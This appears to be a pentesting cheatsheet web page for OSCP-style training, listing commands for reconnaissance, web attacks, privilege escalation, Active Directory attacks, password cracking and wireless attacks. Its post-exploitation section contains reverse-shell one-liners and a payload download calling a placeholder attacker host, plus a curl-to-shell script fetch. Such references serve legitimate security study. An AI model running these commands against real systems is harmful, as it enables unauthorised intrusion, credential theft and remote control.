# Reconnaissance
Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.
Nmap — Network Discovery
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Subdomain & DNS Enumeration
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Directory & File Brute-force
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Web Application Hacking
Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.
SQL Injection
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Burp Suite Essentials
curl -x http://127.0.0.1:8080 -k https://TARGET
# Network Services
Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.
SMB Enumeration
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Try anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Linux Privilege Escalation
After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.
Enumeration Scripts
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Sudo Misconfigurations
sudo -l
Writable /etc/passwd
openssl passwd -1 -salt hacker password123
# Windows Privilege Escalation
Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.
Enumeration
winPEASany.exe quiet fast searchfast
whoami /priv
Token Impersonation
.\GodPotato.exe -cmd "cmd /c whoami"
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
AD pentesting: enumerate users, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Enumeration
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Password Attacks
Crack hashes, brute-force services, and spray credentials across the network.
Hash Cracking
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Online Brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Exploitation
After getting access: establish persistence, pivot, exfiltrate data.
File Transfer
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # On attacker
chisel client ATTACKER_IP:8000 R:socks # On target
# Wireless Attacks
WiFi pentesting: capture handshakes, crack WPA2, rogue access points.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud & Kubernetes
Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
❓ Pentesting FAQ
This cheatsheet covers 200+ essential commands used in OSCP and real-world pentests: nmap scanning, privilege escalation (Linux and Windows), Active Directory attacks, web hacking, and post-exploitation techniques. Bookmark it and use our dedicated OSCP cheatsheet for exam-specific tips.
The essentials: nmap for network scanning, sqlmap for SQL injection, hashcat/john for password cracking, impacket tools for Active Directory, and linpeas/winpeas for privilege escalation enumeration.
Start with recon tools (nmap, subfinder), learn the OWASP Top 10 web vulnerabilities, then practice on HackTheBox or TryHackMe. Our beginner's guide walks you through the full methodology and recommended certifications.
Privilege escalation is gaining higher permissions than initially obtained. Linux: SUID binaries, sudo misconfigs, cron job abuse, writable PATH. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated. Always run LinPEAS/WinPEAS first.
Key tools: BloodHound (attack path mapping), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (WinRM shells), and Rubeus (Kerberos attacks). Start by mapping the domain with BloodHound to find the shortest path to Domain Admin.
SQL injection is a web vulnerability where user input is executed as SQL code. Test manually with ' OR '1'='1 or use sqlmap -u 'http://target/?id=1' --batch --dbs for automation. It can lead to data exfiltration, auth bypass, or remote code execution.
The OWASP Top 10 lists the most critical web application risks: Broken Access Control, Cryptographic Failures, Injection (SQLi/XSS/SSTI), Insecure Design, Security Misconfiguration, Vulnerable Components, Authentication Failures, Software Integrity Failures, Logging Failures, and SSRF. It's the foundation of any web pentesting methodology.
📚 Related Resources
- Pentesting Glossary — 60+ cybersecurity terms defined for ethical hackers
- How to Start Pentesting — Step-by-step beginner's guide with methodology & tools
- Nmap Cheatsheet — The most complete nmap reference for recon and port scanning
- OSCP Cheatsheet — Commands, techniques and exam tips for OSCP preparation
Turn your findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want 11,600+ commands in an interactive mindmap?
This cheatsheet shows a fraction of what Pentest Mindmap offers. Get 33 categories, instant search, and one-click copy — organized as a beautiful interactive mindmap.
Start Free 7-Day Trial →